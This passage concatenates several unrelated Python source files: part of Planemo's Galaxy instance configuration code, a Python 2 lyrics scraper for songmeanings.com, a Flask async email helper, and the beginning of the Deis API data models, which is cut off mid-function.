"""Return target Galaxy version."""
@abc.abstractproperty
def user_api_config(self):
"""Return the API indicated configuration for user session.
Calling .config.get_config() with admin GI session would yield
a different object (admins have different view of Galaxy's
configuration).
"""
@property
def user_is_admin(self):
return self.user_api_config["is_admin_user"]
@add_metaclass(abc.ABCMeta)
class GalaxyConfig(GalaxyInterface):
"""Specialization of GalaxyInterface for Galaxy instances Planemo manages itself.
This assumes more than an API connection is available - Planemo needs to be able to
start and stop the Galaxy instance, recover logs, etc... There are currently two
    implementations - a locally executed Galaxy and one running inside a Docker container.
"""
@abc.abstractproperty
def kill(self):
"""Stop the running instance."""
@abc.abstractmethod
def startup_command(self, ctx, **kwds):
"""Return a shell command used to startup this instance.
Among other common planmo kwds, this should respect the
``daemon`` keyword.
"""
@abc.abstractproperty
def log_contents(self):
"""Retrieve text of log for running Galaxy instance."""
@abc.abstractmethod
def cleanup(self):
"""Cleanup allocated resources to run this instance."""
@abc.abstractproperty
def use_path_paste(self):
"""Use path paste to upload data.
This will only be an option if the target user key is an
admin user key.
"""
class BaseGalaxyConfig(GalaxyInterface):
def __init__(
self,
ctx,
galaxy_url,
master_api_key,
user_api_key,
runnables,
kwds,
):
self._ctx = ctx
self.galaxy_url = galaxy_url
self.master_api_key = master_api_key
self._user_api_key = user_api_key
self.runnables = runnables
self._kwds = kwds
self._workflow_ids = {}
self._target_version = UNINITIALIZED
self._target_user_config = UNINITIALIZED
@property
def gi(self):
assert self.galaxy_url
return gi(url=self.galaxy_url, key=self.master_api_key)
@property
def user_gi(self):
user_api_key = self.user_api_key
assert user_api_key
return self._gi_for_key(user_api_key)
@property
def user_api_key(self):
# TODO: thread-safe
if self._user_api_key is None:
# TODO: respect --galaxy_email - seems like a real bug
self._user_api_key = user_api_key(self.gi)
return self._user_api_key
def _gi_for_key(self, key):
assert self.galaxy_url
return gi(url=self.galaxy_url, key=key)
def install_repo(self, *args, **kwds):
self.tool_shed_client.install_repository_revision(
*args, **kwds
)
@property
def tool_shed_client(self):
return self.gi.toolShed
def wait_for_all_installed(self):
def status_ready(repo):
status = repo["status"]
if status in ["Installing", "New"]:
return None
if status == "Installed":
return True
raise Exception("Error installing repo status is %s" % status)
def ready():
repos = self.tool_shed_client.get_repositories()
ready = all(map(status_ready, repos))
return ready or None
wait_on(ready, "galaxy tool installation", timeout=DEFAULT_TOOL_INSTALL_TIMEOUT)
def install_workflows(self):
for runnable in self.runnables:
if runnable.type.name in ["galaxy_workflow", "cwl_workflow"] and not runnable.is_remote_workflow_uri:
self._install_workflow(runnable)
def _install_workflow(self, runnable):
if self._kwds.get("shed_install") and (self._kwds.get("engine") != "external_galaxy" or self._kwds.get("galaxy_admin_key")):
install_shed_repos(runnable,
self.gi,
self._kwds.get("ignore_dependency_problems", False),
self._kwds.get("install_tool_dependencies", False),
self._kwds.get("install_resolver_dependencies", True),
self._kwds.get("install_repository_dependencies", True))
default_from_path = self._kwds.get("workflows_from_path", False)
# TODO: Allow serialization so this doesn't need to assume a
# shared filesystem with Galaxy server.
from_path = default_from_path or (runnable.type.name == "cwl_workflow")
workflow = import_workflow(
runnable.path, admin_gi=self.gi, user_gi=self.user_gi, from_path=from_path
)
self._workflow_ids[runnable.path] = workflow["id"]
def workflow_id_for_runnable(self, runnable):
if runnable.is_remote_workflow_uri:
workflow_id = remote_runnable_to_workflow_id(runnable)
else:
workflow_id = self.workflow_id(runnable.path)
return workflow_id
def workflow_id(self, path):
return self._workflow_ids[path]
@property
def use_path_paste(self):
option = self._kwds.get("paste_test_data_paths")
if option is None:
return self.default_use_path_paste
else:
return option
@property
def default_use_path_paste(self):
return False
@property
def version_major(self):
"""Return target Galaxy version."""
if self._target_version is UNINITIALIZED:
self._target_version = self.user_gi.config.get_version()["version_major"]
return self._target_version
@property
def user_api_config(self):
"""Return the API indicated configuration for user session."""
if self._target_user_config is UNINITIALIZED:
self._target_user_config = self.user_gi.config.get_config()
return self._target_user_config
class BaseManagedGalaxyConfig(BaseGalaxyConfig):
def __init__(
self,
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
kwds,
):
galaxy_url = "http://localhost:%d" % port
super(BaseManagedGalaxyConfig, self).__init__(
ctx=ctx,
galaxy_url=galaxy_url,
master_api_key=master_api_key,
user_api_key=None,
runnables=runnables,
kwds=kwds
)
self.config_directory = config_directory
self.env = env
self.test_data_dir = test_data_dir
self.port = port
self.server_name = server_name
class DockerGalaxyConfig(BaseManagedGalaxyConfig):
"""A :class:`GalaxyConfig` description of a Dockerized Galaxy instance."""
def __init__(
self,
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
docker_target_kwds,
volumes,
export_directory,
kwds,
):
super(DockerGalaxyConfig, self).__init__(
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
kwds,
)
self.docker_target_kwds = docker_target_kwds
self.volumes = volumes
self.export_directory = export_directory
def kill(self):
"""Kill planemo container..."""
kill_command = docker_util.kill_command(
self.server_name,
**self.docker_target_kwds
)
return shell(kill_command)
def startup_command(self, ctx, **kwds):
"""Return a shell command used to startup this instance.
Among other common planmo kwds, this should respect the
``daemon`` keyword.
"""
daemon = kwds.get("daemon", False)
daemon_str = "" if not daemon else " -d"
docker_run_extras = "-p %s:80%s" % (self.port, daemon_str)
env_directives = ["%s='%s'" % item for item in self.env.items()]
image = kwds.get("docker_galaxy_image", "bgruening/galaxy-stable")
run_command = docker_util.build_docker_run_command(
"", image,
interactive=False,
env_directives=env_directives,
working_directory=None,
name=self.server_name,
run_extra_arguments=docker_run_extras,
set_user=False,
volumes=self.volumes,
**self.docker_target_kwds
)
chmod_command = [
"chmod",
"-R",
"o+rwx",
self.config_directory,
]
if self.export_directory:
chmod_command.append(self.export_directory)
return shell_join(
argv_to_str(chmod_command),
run_command,
)
@property
def log_contents(self):
logs_command = docker_util.logs_command(
self.server_name,
**self.docker_target_kwds
)
output, _ = communicate(
logs_command
)
return output
def cleanup(self):
shutil.rmtree(self.config_directory, CLEANUP_IGNORE_ERRORS)
class LocalGalaxyConfig(BaseManagedGalaxyConfig):
"""A local, non-containerized implementation of :class:`GalaxyConfig`."""
def __init__(
self,
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
galaxy_root,
kwds,
):
super(LocalGalaxyConfig, self).__init__(
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
kwds,
)
self.galaxy_root = galaxy_root
def kill(self):
if self._ctx.verbose:
shell(["ps", "ax"])
exists = os.path.exists(self.pid_file)
print("Killing pid file [%s]" % self.pid_file)
print("pid_file exists? [%s]" % exists)
if exists:
print("pid_file contents are [%s]" % open(self.pid_file, "r").read())
kill_pid_file(self.pid_file)
def startup_command(self, ctx, **kwds):
"""Return a shell command used to startup this instance.
Among other common planemo kwds, this should respect the
``daemon`` keyword.
"""
daemon = kwds.get("daemon", False)
# TODO: Allow running dockerized Galaxy here instead.
setup_venv_command = setup_venv(ctx, kwds)
run_script = "%s $COMMON_STARTUP_ARGS" % shlex_quote(os.path.join(self.galaxy_root, "run.sh"))
if daemon:
run_script += " --daemon"
self.env["GALAXY_RUN_ALL"] = "1"
else:
run_script += " --server-name %s" % shlex_quote(self.server_name)
server_ini = os.path.join(self.config_directory, "galaxy.ini")
self.env["GALAXY_CONFIG_FILE"] = server_ini
if parse_version(kwds.get('galaxy_python_version') or DEFAULT_PYTHON_VERSION) >= parse_version('3'):
# We need to start under gunicorn
self.env['APP_WEBSERVER'] = 'gunicorn'
self.env['GUNICORN_CMD_ARGS'] = "--timeout={timeout} --capture-output --bind={host}:{port} --name={server_name}".format(
timeout=DEFAULT_TOOL_INSTALL_TIMEOUT,
host=kwds.get('host', '127.0.0.1'),
port=kwds['port'],
server_name=self.server_name,
)
cd_to_galaxy_command = ['cd', self.galaxy_root]
return shell_join(
cd_to_galaxy_command,
setup_venv_command,
setup_common_startup_args(),
run_script,
)
@property
def log_file(self):
"""Log file used when planemo serves this Galaxy instance."""
file_name = "%s.log" % self.server_name
return os.path.join(self.galaxy_root, file_name)
@property
def pid_file(self):
pid_file_name = "%s.pid" % self.server_name
return os.path.join(self.galaxy_root, pid_file_name)
@property
def log_contents(self):
if not os.path.exists(self.log_file):
return ""
with open(self.log_file, "r") as f:
return f.read()
def cleanup(self):
shutil.rmtree(self.config_directory, CLEANUP_IGNORE_ERRORS)
@property
def default_use_path_paste(self):
# If Planemo started a local, native Galaxy instance assume files URLs can be
# pasted.
return self.user_is_admin
def _database_connection(database_location, **kwds):
default_connection = DATABASE_LOCATION_TEMPLATE % database_location
database_connection = kwds.get("database_connection") or default_connection
return database_connection
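# Illustrative sketch (an assumption, not planemo API): the default connection string
# produced by _database_connection when no ``database_connection`` kwd is supplied,
# built from DATABASE_LOCATION_TEMPLATE defined above. The path is a placeholder.
def _example_default_database_connection():
    # Returns 'sqlite:////tmp/planemo_cfg/galaxy.sqlite?isolation_level=IMMEDIATE'
    return _database_connection("/tmp/planemo_cfg/galaxy.sqlite")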
def _find_galaxy_root(ctx, **kwds):
root_prop = "galaxy_root"
cwl = kwds.get("cwl", False)
if cwl:
root_prop = "cwl_galaxy_root"
galaxy_root = kwds.get(root_prop, None)
if galaxy_root:
return galaxy_root
else:
par_dir = os.getcwd()
while True:
run = os.path.join(par_dir, "run.sh")
config = os.path.join(par_dir, "config")
if os.path.isfile(run) and os.path.isdir(config):
return par_dir
new_par_dir = os.path.dirname(par_dir)
if new_par_dir == par_dir:
break
par_dir = new_par_dir
return None
def _find_test_data(runnables, **kwds):
test_data_search_path = "."
runnables = [r for r in runnables if r.has_tools]
if len(runnables) > 0:
test_data_search_path = runnables[0].test_data_search_path
# Find test data directory associated with path.
test_data = kwds.get("test_data", None)
if test_data:
return os.path.abspath(test_data)
else:
test_data = _search_tool_path_for(test_data_search_path, "test-data")
if test_data:
return test_data
warn(NO_TEST_DATA_MESSAGE)
return None
def _find_tool_data_table(runnables, test_data_dir, **kwds):
tool_data_search_path = "."
runnables = [r for r in runnables if r.has_tools]
if len(runnables) > 0:
tool_data_search_path = runnables[0].tool_data_search_path
tool_data_table = kwds.get("tool_data_table", None)
if tool_data_table:
return os.path.abspath(tool_data_table)
else:
extra_paths = [test_data_dir] if test_data_dir else []
return _search_tool_path_for(
tool_data_search_path,
"tool_data_table_conf.xml.test",
extra_paths,
) or _search_tool_path_for( # if all else fails just use sample
tool_data_search_path,
"tool_data_table_conf.xml.sample"
)
def _search_tool_path_for(path, target, extra_paths=None):
"""Check for presence of a target in different artifact directories."""
if extra_paths is None:
extra_paths = []
if not os.path.isdir(path):
tool_dir = os.path.dirname(path)
else:
tool_dir = path
possible_dirs = [tool_dir, "."] + extra_paths
for possible_dir in possible_dirs:
possible_path = os.path.join(possible_dir, target)
if os.path.exists(possible_path):
return os.path.abspath(possible_path)
return None
def _configure_sheds_config_file(ctx, config_directory, **kwds):
if "shed_target" not in kwds:
kwds = kwds.copy()
kwds["shed_target"] = "toolshed"
shed_target_url = tool_shed_url(ctx, **kwds)
contents = _sub(TOOL_SHEDS_CONF, {"shed_target_url": shed_target_url})
tool_sheds_conf = os.path.join(config_directory, "tool_sheds_conf.xml")
write_file(tool_sheds_conf, contents)
return tool_sheds_conf
def _tool_conf_entry_for(tool_paths):
tool_definitions = ""
for tool_path in tool_paths:
if os.path.isdir(tool_path):
tool_definitions += '''<tool_dir dir="%s" />''' % tool_path
else:
tool_definitions += '''<tool file="%s" />''' % tool_path
return tool_definitions
def _install_galaxy(ctx, galaxy_root, env, kwds):
if not kwds.get("no_cache_galaxy", False):
_install_galaxy_via_git(ctx, galaxy_root, env, kwds)
else:
_install_galaxy_via_download(ctx, galaxy_root, env, kwds)
def _install_galaxy_via_download(ctx, galaxy_root, env, kwds):
branch = _galaxy_branch(kwds)
untar_to("https://codeload.github.com/galaxyproject/galaxy/tar.gz/" + branch, tar_args=['-xvzf', '-', 'galaxy-' + branch], dest_dir=galaxy_root)
_install_with_command(ctx, galaxy_root, env, kwds)
def _install_galaxy_via_git(ctx, galaxy_root, env, kwds):
gx_repo = _ensure_galaxy_repository_available(ctx, kwds)
branch = _galaxy_branch(kwds)
command = git.command_clone(ctx, gx_repo, galaxy_root, branch=branch)
exit_code = shell(command, env=env)
if exit_code != 0:
raise Exception("Failed to glone Galaxy via git")
_install_with_command(ctx, galaxy_root, env, kwds)
def _build_eggs_cache(ctx, env, kwds):
if kwds.get("no_cache_galaxy", False):
return None
workspace = ctx.workspace
eggs_path = os.path.join(workspace, "gx_eggs")
if not os.path.exists(eggs_path):
os.makedirs(eggs_path)
env["GALAXY_EGGS_PATH"] = eggs_path
def _galaxy_branch(kwds):
branch = kwds.get("galaxy_branch", None)
if branch is None:
cwl = kwds.get("cwl", False)
branch = "cwl-1.0" if cwl else None
if branch is None:
branch = DEFAULT_GALAXY_BRANCH
return branch
def _galaxy_source(kwds):
source = kwds.get("galaxy_source", None)
if source is None:
cwl = kwds.get("cwl", False)
source = CWL_GALAXY_SOURCE if cwl else None
if source is None:
source = DEFAULT_GALAXY_SOURCE
return source
def _install_with_command(ctx, galaxy_root, env, kwds):
setup_venv_command = setup_venv(ctx, kwds)
install_cmd = shell_join(
setup_venv_command,
setup_common_startup_args(),
COMMAND_STARTUP_COMMAND,
)
exit_code = shell(install_cmd, cwd=galaxy_root, env=env)
if exit_code != 0:
raise Exception("Failed to install Galaxy via command [%s]" % install_cmd)
if not os.path.exists(galaxy_root):
raise Exception("Failed to create Galaxy directory [%s]" % galaxy_root)
if not os.path.exists(os.path.join(galaxy_root, "lib")):
raise Exception("Failed to create Galaxy directory [%s], lib missing" % galaxy_root)
def _ensure_galaxy_repository_available(ctx, kwds):
workspace = ctx.workspace
cwl = kwds.get("cwl", False)
galaxy_source = kwds.get('galaxy_source')
if galaxy_source and galaxy_source != DEFAULT_GALAXY_SOURCE:
sanitized_repo_name = "".join(c if c.isalnum() else '_' for c in kwds['galaxy_source']).rstrip()[:255]
gx_repo = os.path.join(workspace, "gx_repo_%s" % sanitized_repo_name)
else:
gx_repo = os.path.join(workspace, "gx_repo")
if cwl:
gx_repo += "_cwl"
if os.path.exists(gx_repo):
# Convert the git repository from bare to mirror, if needed
shell(['git', '--git-dir', gx_repo, 'config', 'remote.origin.fetch', '+refs/*:refs/*'])
shell(['git', '--git-dir', gx_repo, 'config', 'remote.origin.mirror', 'true'])
# Attempt remote update - but don't fail if not interweb, etc...
shell("git --git-dir %s remote update >/dev/null 2>&1" % gx_repo)
else:
remote_repo = _galaxy_source(kwds)
command = git.command_clone(ctx, remote_repo, gx_repo, mirror=True)
shell(command)
return gx_repo
def _build_env_for_galaxy(properties, template_args):
env = {}
for key, value in iteritems(properties):
if value is not None: # Do not override None with empty string
var = "GALAXY_CONFIG_OVERRIDE_%s" % key.upper()
value = _sub(value, template_args)
env[var] = value
return env
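# Minimal sketch (illustrative only, not part of planemo): demonstrates how
# _build_env_for_galaxy maps each Galaxy property to a GALAXY_CONFIG_OVERRIDE_*
# environment variable and substitutes template arguments on the way. The property
# values here are made up for the example.
def _example_build_env_for_galaxy():
    properties = {"log_level": "${log_level}", "debug": "true"}
    template_args = {"log_level": "DEBUG"}
    env = _build_env_for_galaxy(properties, template_args)
    # env == {'GALAXY_CONFIG_OVERRIDE_LOG_LEVEL': 'DEBUG',
    #         'GALAXY_CONFIG_OVERRIDE_DEBUG': 'true'}
    return env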
def _build_test_env(properties, env):
# Keeping these environment variables around for a little while but
# many are probably not needed as of the following commit.
# https://bitbucket.org/galaxy/galaxy-central/commits/d7dd1f9
test_property_variants = {
'GALAXY_TEST_JOB_CONFIG_FILE': 'job_config_file',
'GALAXY_TEST_MIGRATED_TOOL_CONF': 'migrated_tools_config',
'GALAXY_TEST_TOOL_CONF': 'tool_config_file',
'GALAXY_TEST_FILE_DIR': 'test_data_dir',
'GALAXY_TOOL_DEPENDENCY_DIR': 'tool_dependency_dir',
# Next line would be required for tool shed tests.
# 'GALAXY_TEST_TOOL_DEPENDENCY_DIR': 'tool_dependency_dir',
}
for test_key, gx_key in test_property_variants.items():
value = properties.get(gx_key, None)
if value is not None:
env[test_key] = value
def _handle_job_config_file(config_directory, server_name, kwds):
job_config_file = kwds.get("job_config_file", None)
if not job_config_file:
template_str = JOB_CONFIG_LOCAL
job_config_file = os.path.join(
config_directory,
"job_conf.xml",
)
docker_enable = str(kwds.get("docker", False))
docker_host = kwds.get("docker_host", docker_util.DEFAULT_HOST)
docker_host_param = ""
if docker_host:
docker_host_param = """<param id="docker_host">%s</param>""" % docker_host
conf_contents = Template(template_str).safe_substitute({
"server_name": server_name,
"docker_enable": docker_enable,
"require_container": "false",
"docker_sudo": str(kwds.get("docker_sudo", False)),
"docker_sudo_cmd": str(kwds.get("docker_sudo_cmd", docker_util.DEFAULT_SUDO_COMMAND)),
"docker_cmd": str(kwds.get("docker_cmd", docker_util.DEFAULT_DOCKER_COMMAND)),
"docker_host_param": docker_host_param,
})
write_file(job_config_file, conf_contents)
kwds["job_config_file"] = job_config_file
def _write_tool_conf(ctx, tool_paths, tool_conf_path):
tool_definition = _tool_conf_entry_for(tool_paths)
tool_conf_template_kwds = dict(tool_definition=tool_definition)
tool_conf_contents = _sub(TOOL_CONF_TEMPLATE, tool_conf_template_kwds)
write_file(tool_conf_path, tool_conf_contents)
ctx.vlog(
"Writing tool_conf to path %s with contents [%s]",
tool_conf_path,
tool_conf_contents,
)
def _handle_container_resolution(ctx, kwds, galaxy_properties):
if kwds.get("mulled_containers", False):
galaxy_properties["enable_beta_mulled_containers"] = "True"
involucro_context = build_involucro_context(ctx, **kwds)
galaxy_properties["involucro_auto_init"] = "False" # Use planemo's
galaxy_properties["involucro_path"] = involucro_context.involucro_bin
def _handle_job_metrics(config_directory, kwds):
metrics_conf = os.path.join(config_directory, "job_metrics_conf.xml")
with open(metrics_conf, "w") as fh:
fh.write(EMPTY_JOB_METRICS_TEMPLATE)
kwds["job_metrics_config_file"] = metrics_conf
def _handle_refgenie_config(config_directory, kwds):
refgenie_dir = os.path.join(config_directory, 'refgenie')
_ensure_directory(refgenie_dir)
refgenie_config = os.path.join(refgenie_dir, "genome_config.yaml")
with open(refgenie_config, "w") as fh:
fh.write(REFGENIE_CONFIG_TEMPLATE % (refgenie_dir))
kwds["refgenie_config_file"] = refgenie_config
def _handle_kwd_overrides(properties, kwds):
kwds_gx_properties = [
'job_config_file',
'job_metrics_config_file',
'dependency_resolvers_config_file',
]
for prop in kwds_gx_properties:
val = kwds.get(prop, None)
if val:
properties[prop] = val
def _sub(template, args):
if template is None:
return ''
return Template(template).safe_substitute(args)
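# Short sketch (illustrative, not part of planemo): _sub relies on
# Template.safe_substitute, so unknown placeholders survive untouched. This is why
# values such as "${temp_directory}/tmp" pass through safely even when a given
# template_args dict does not define every key.
def _example_sub_behaviour():
    assert _sub("${known} and ${unknown}", {"known": "value"}) == "value and ${unknown}"
    assert _sub(None, {}) == ""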
def _ensure_directory(path):
if path is not None and not os.path.exists(path):
os.makedirs(path)
__all__ = (
"DATABASE_LOCATION_TEMPLATE",
"galaxy_config",
)
|
gather.py
|
#!/usr/bin/env python
__author__ = 'Tony Beltramelli www.tonybeltramelli.com - 09/07/2016'
import argparse
import os
import urllib2
import re
from threading import Thread
from HTMLParser import HTMLParser
DOMAIN = "songmeanings.com/"
ARTIST_PATH = 'artist/view/songs/'
def start_new_thread(task, arg):
thread = Thread(target=task, args=(arg,))
thread.start()
def write_to_file(path, data):
output_file = open(path, 'a')
output_file.write(data)
output_file.write("\n")
output_file.close()
def get_url(path, arg = ""):
return 'http://' + DOMAIN + path + arg
def get_page_content(url):
response = urllib2.urlopen(url)
return response.read()
class SongPageParser(HTMLParser):
record = False
lyrics = ""
output_path = ""
def handle_starttag(self, tag, attrs):
for attr in attrs:
if attr[0] == "class" and attr[1].find('lyric-box') != -1:
self.record = True
if attr[0] == "id" and attr[1].find('lyrics-edit') != -1:
self.record = False
write_to_file(self.output_path, self.lyrics)
self.lyrics = ""
def handle_data(self, data):
if self.record:
self.lyrics += re.sub(r'[^\x00-\x7F]+', '\'', data.lstrip()) + "\n"
class ArtistPageParser(HTMLParser):
match = 0
url = ""
title = ""
output_path = ""
def handle_starttag(self, tag, attrs):
href = None
for attr in attrs:
if attr[0] == "id" and attr[1].find('lyric-') != -1:
self.match += 1
if attr[0] == "href" and attr[1].find(DOMAIN) != -1:
self.match += 1
href = attr[1]
if self.match > 1 and href is not None:
self.url = href[href.find(DOMAIN) + len(DOMAIN):]
def handle_endtag(self, tag):
self.match = 0
def handle_data(self, data):
if self.match > 1:
self.title = data
html = get_page_content(get_url(self.url))
song_parser = SongPageParser()
song_parser.output_path = self.output_path
start_new_thread(song_parser.feed, html)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--output_file', type=str, required=True)
parser.add_argument('--artists', type=str, required=True)
args = parser.parse_args()
output_file = args.output_file
artists = args.artists.replace(' ', '').split(',')
try:
os.remove(output_file)
except OSError:
print "The output file doesn't exist, creating it"
print "Gathering lyrics..."
for i, artist in enumerate(artists):
html = get_page_content(get_url(ARTIST_PATH, artist))
artist_parser = ArtistPageParser()
artist_parser.output_path = output_file
artist_parser.feed(html)
print "Progress: {}%".format(((i + 1) * 100) / len(artists))
print "Lyrics saved in {}".format(output_file)
if __name__ == "__main__":
main()
|
email.py
|
# _*_ coding: utf-8 _*_
from threading import Thread
from flask import current_app, render_template
from flask.ext.mail import Message
from . import mail
def send_email(app, msg):
"""
在应用上下文中发送邮件。
"""
with app.app_context():
mail.send(msg)
def send_async_email(to, subject, template, **kwargs):
"""
异步地发送邮件。
"""
app = current_app._get_current_object()
msg = Message(app.config['XING_MAIL_SUBJECT_PREFIX'] + " " + \
subject, sender=app.config['XING_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template+".txt", **kwargs)
msg.html = render_template(template+".html", **kwargs)
thr = Thread(target=send_email, args=[app, msg])
thr.start()
return thr
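# Hypothetical usage sketch (not part of this module): how a Flask view might trigger an
# asynchronous confirmation mail. The template name, recipient, and token parameter are
# assumptions for illustration; the real templates and config keys depend on the app.
def example_send_confirmation(user_email, confirm_token):
    return send_async_email(user_email, "Please confirm your account",
                            "mail/confirm", token=confirm_token)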
|
models.py
|
# -*- coding: utf-8 -*-
"""
Data models for the Deis API.
"""
from __future__ import unicode_literals
import base64
from datetime import datetime
import etcd
import importlib
import logging
import re
import time
from threading import Thread
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.exceptions import ValidationError, SuspiciousOperation
from django.db import models
from django.db.models import Count
from django.db.models import Max
from django.db.models.signals import post_delete, post_save
from django.dispatch import receiver
from django.utils.encoding import python_2_unicode_compatible
from docker.utils import utils as dockerutils
from json_field.fields import JSONField
from OpenSSL import crypto
import requests
from rest_framework.authtoken.models import Token
from api import fields, utils, exceptions
from registry import publish_release
from utils import dict_diff, fingerprint
logger = logging.getLogger(__name__)
def close_db_connections(func, *args, **kwargs):
"""
Decorator to explicitly close db connections during threaded execution
Note this is necessary to work around:
https://code.djangoproject.com/ticket/22420
"""
def _close_db_connections(*args, **kwargs):
ret = None
try:
ret = func(*args, **kwargs)
finally:
from django.db import connections
for conn in connections.all():
conn.close()
return ret
return _close_db_connections
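# Illustrative sketch (an assumption, not part of the Deis code base): how
# close_db_connections is typically applied to work that runs on a worker Thread,
# so that thread's Django connections are closed once the call returns.
@close_db_connections
def _example_threaded_query():
    # e.g. Thread(target=_example_threaded_query).start()
    return App.objects.count()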
def log_event(app, msg, level=logging.INFO):
# controller needs to know which app this log comes from
logger.log(level, "{}: {}".format(app.id, msg))
app.log(msg, level)
def validate_base64(value):
"""Check that value contains only valid base64 characters."""
try:
base64.b64decode(value.split()[1])
except Exception as e:
raise ValidationError(e)
def validate_id_is_docker_compatible(value):
"""
Check that the ID follows docker's image name constraints
"""
match = re.match(r'^[a-z0-9-]+$', value)
if not match:
raise ValidationError("App IDs can only contain [a-z0-9-].")
def validate_app_structure(value):
"""Error if the dict values aren't ints >= 0."""
try:
if any(int(v) < 0 for v in value.viewvalues()):
raise ValueError("Must be greater than or equal to zero")
except ValueError, err:
raise ValidationError(err)
def validate_reserved_names(value):
"""A value cannot use some reserved names."""
if value in settings.DEIS_RESERVED_NAMES:
raise ValidationError('{} is a reserved name.'.format(value))
def validate_comma_separated(value):
"""Error if the value doesn't look like a list of hostnames or IP addresses
separated by commas.
"""
if not re.search(r'^[a-zA-Z0-9-,\.]+$', value):
raise ValidationError(
"{} should be a comma-separated list".format(value))
def validate_domain(value):
"""Error if the domain contains unexpected characters."""
if not re.search(r'^[a-zA-Z0-9-\.]+$', value):
raise ValidationError('"{}" contains unexpected characters'.format(value))
def validate_certificate(value):
try:
crypto.load_certificate(crypto.FILETYPE_PEM, value)
except crypto.Error as e:
raise ValidationError('Could not load certificate: {}'.format(e))
def validate_common_name(value):
if '*' in value:
raise ValidationError('Wildcard certificates are not supported')
def get_etcd_client():
if not hasattr(get_etcd_client, "client"):
# wire up etcd publishing if we can connect
try:
get_etcd_client.client = etcd.Client(
host=settings.ETCD_HOST,
port=int(settings.ETCD_PORT))
get_etcd_client.client.get('/deis')
except etcd.EtcdException:
logger.log(logging.WARNING, 'Cannot synchronize with etcd cluster')
get_etcd_client.client = None
return get_etcd_client.client
class AuditedModel(models.Model):
"""Add created and updated fields to a model."""
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
"""Mark :class:`AuditedModel` as abstract."""
abstract = True
def select_app_name():
"""Select a unique randomly generated app name"""
name = utils.generate_app_name()
while App.objects.filter(id=name).exists():
name = utils.generate_app_name()
return name
class UuidAuditedModel(AuditedModel):
"""Add a UUID primary key to an :class:`AuditedModel`."""
uuid = fields.UuidField('UUID', primary_key=True)
class Meta:
"""Mark :class:`UuidAuditedModel` as abstract."""
abstract = True
@python_2_unicode_compatible
class App(UuidAuditedModel):
"""
Application used to service requests on behalf of end-users
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
id = models.SlugField(max_length=64, unique=True, default=select_app_name,
validators=[validate_id_is_docker_compatible,
validate_reserved_names])
structure = JSONField(default={}, blank=True, validators=[validate_app_structure])
class Meta:
permissions = (('use_app', 'Can use app'),)
@property
def _scheduler(self):
mod = importlib.import_module(settings.SCHEDULER_MODULE)
return mod.SchedulerClient(settings.SCHEDULER_TARGET,
settings.SCHEDULER_AUTH,
settings.SCHEDULER_OPTIONS,
settings.SSH_PRIVATE_KEY)
def __str__(self):
return self.id
@property
def url(self):
return self.id + '.' + settings.DEIS_DOMAIN
def _get_job_id(self, container_type):
app = self.id
release = self.release_set.latest()
version = "v{}".format(release.version)
job_id = "{app}_{version}.{container_type}".format(**locals())
return job_id
def _get_command(self, container_type):
try:
# if this is not procfile-based app, ensure they cannot break out
# and run arbitrary commands on the host
# FIXME: remove slugrunner's hardcoded entrypoint
release = self.release_set.latest()
if release.build.dockerfile or not release.build.sha:
return "bash -c '{}'".format(release.build.procfile[container_type])
else:
return 'start {}'.format(container_type)
# if the key is not present or if a parent attribute is None
except (KeyError, TypeError, AttributeError):
# handle special case for Dockerfile deployments
return '' if container_type == 'cmd' else 'start {}'.format(container_type)
def log(self, message, level=logging.INFO):
"""Logs a message in the context of this application.
        This prefixes log messages with an application "tag" that the customized deis-logspout will
        be on the lookout for. When it is seen, the message (usually an application event such as
        releasing or scaling) is considered to "belong" to the application rather than to the
        controller and is handled accordingly.
"""
logger.log(level, "[{}]: {}".format(self.id, message))
def create(self, *args, **kwargs):
"""Create a new application with an initial config and release"""
config = Config.objects.create(owner=self.owner, app=self)
Release.objects.create(version=1, owner=self.owner, app=self, config=config, build=None)
def delete(self, *args, **kwargs):
"""Delete this application including all containers"""
try:
# attempt to remove containers from the scheduler
self._destroy_containers([c for c in self.container_set.exclude(type='run')])
except RuntimeError:
pass
self._clean_app_logs()
return super(App, self).delete(*args, **kwargs)
def restart(self, **kwargs):
to_restart = self.container_set.all()
if kwargs.get('type'):
to_restart = to_restart.filter(type=kwargs.get('type'))
if kwargs.get('num'):
to_restart = to_restart.filter(num=kwargs.get('num'))
self._restart_containers(to_restart)
return to_restart
def _clean_app_logs(self):
"""Delete application logs stored by the logger component"""
try:
url = 'http://{}:{}/{}/'.format(settings.LOGGER_HOST, settings.LOGGER_PORT, self.id)
requests.delete(url)
except Exception as e:
# Ignore errors deleting application logs. An error here should not interfere with
# the overall success of deleting an application, but we should log it.
err = 'Error deleting existing application logs: {}'.format(e)
log_event(self, err, logging.WARNING)
def scale(self, user, structure): # noqa
"""Scale containers up or down to match requested structure."""
if self.release_set.latest().build is None:
raise EnvironmentError('No build associated with this release')
requested_structure = structure.copy()
release = self.release_set.latest()
# test for available process types
available_process_types = release.build.procfile or {}
for container_type in requested_structure:
if container_type == 'cmd':
continue # allow docker cmd types in case we don't have the image source
if container_type not in available_process_types:
raise EnvironmentError(
'Container type {} does not exist in application'.format(container_type))
msg = '{} scaled containers '.format(user.username) + ' '.join(
"{}={}".format(k, v) for k, v in requested_structure.items())
log_event(self, msg)
# iterate and scale by container type (web, worker, etc)
changed = False
to_add, to_remove = [], []
scale_types = {}
# iterate on a copy of the container_type keys
for container_type in requested_structure.keys():
containers = list(self.container_set.filter(type=container_type).order_by('created'))
# increment new container nums off the most recent container
results = self.container_set.filter(type=container_type).aggregate(Max('num'))
container_num = (results.get('num__max') or 0) + 1
requested = requested_structure.pop(container_type)
diff = requested - len(containers)
if diff == 0:
continue
changed = True
scale_types[container_type] = requested
while diff < 0:
c = containers.pop()
to_remove.append(c)
diff += 1
while diff > 0:
# create a database record
c = Container.objects.create(owner=self.owner,
app=self,
release=release,
type=container_type,
num=container_num)
to_add.append(c)
container_num += 1
diff -= 1
